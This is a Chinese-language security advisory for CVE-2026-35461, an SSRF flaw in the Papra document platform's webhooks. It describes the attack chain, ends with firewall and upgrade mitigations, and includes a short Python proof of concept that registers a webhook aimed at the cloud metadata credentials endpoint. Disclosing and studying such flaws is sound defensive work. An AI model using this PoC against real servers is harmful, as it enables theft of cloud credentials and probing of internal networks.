IPBUF安全漏洞报告
English
CVE-2026-35461 CVSS 5.0 中危

CVE-2026-35461 Papra SSRF漏洞

披露日期: 2026-04-07

漏洞信息

漏洞编号
CVE-2026-35461
漏洞类型
服务器端请求伪造 (SSRF)
CVSS评分
5.0 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Papra

相关标签

SSRFPapraWebhook内网探测信息泄露

漏洞概述

Papra在26.4.0版本前存在SSRF漏洞。经过身份验证的用户可注册任意URL(包括内网地址)作为Webhook端点,服务器会向这些地址发起HTTP请求,导致内网探测或信息泄露。

技术细节

该漏洞源于Papra的Webhook系统缺乏对目标地址的有效验证机制。攻击者利用低权限账户登录系统后,可以在Webhook配置中设置恶意的内部网络地址(如http://127.0.0.1:6379或云厂商元数据服务http://169.254.169.254)。当系统发生文档事件(如上传、修改)时,服务器会向攻击者指定的内网地址发送HTTP POST请求。由于请求源自服务器本地,攻击者可借此绕过网络边界防护,探测内网端口状态、读取本地敏感文件(如/etc/passwd)或获取云实例临时凭证,进而横向移动。

攻击链分析

STEP 1
1. 获取凭证
攻击者注册或获取一个合法的低权限用户账户,成功登录Papra平台。
STEP 2
2. 配置Webhook
攻击者进入Webhook设置页面,利用漏洞将回调URL设置为内网敏感地址(如127.0.0.1或云元数据服务)。
STEP 3
3. 触发事件
攻击者在平台上执行文档操作(如上传、修改文件),触发系统定义的Webhook事件。
STEP 4
4. 服务端请求
Papra服务器解析Webhook配置,向攻击者指定的内网地址发起HTTP POST请求。
STEP 5
5. 信息回显
攻击者根据服务器的响应时间、错误信息或带外数据,确认内网服务的存在并获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the Papra instance target_url = "http://target-papra-instance.com/api/webhooks" # Attacker's session cookie (obtained after authentication) cookies = { "session": "authenticated_session_cookie_here" } # Malicious payload pointing to internal metadata service or localhost internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Data to register the malicious webhook webhook_data = { "url": internal_target, "events": ["document.created"] } try: # Send request to register the webhook response = requests.post(target_url, json=webhook_data, cookies=cookies) if response.status_code == 200: print("[+] Malicious webhook registered successfully.") print("[+] Trigger a document event to force the server to send a request to:", internal_target) else: print("[-] Failed to register webhook.") print("Status code:", response.status_code) print("Response:", response.text) except Exception as e: print("Error:", e)

影响范围

Papra < 26.4.0

防御指南

临时缓解措施
如果无法立即升级,建议在防火墙或安全组层面阻断服务器对RFC1918内网地址段(127.0.0.1, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)及云元数据IP(169.254.169.254)的出站连接,或者临时禁用Webhook功能以阻断攻击路径。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表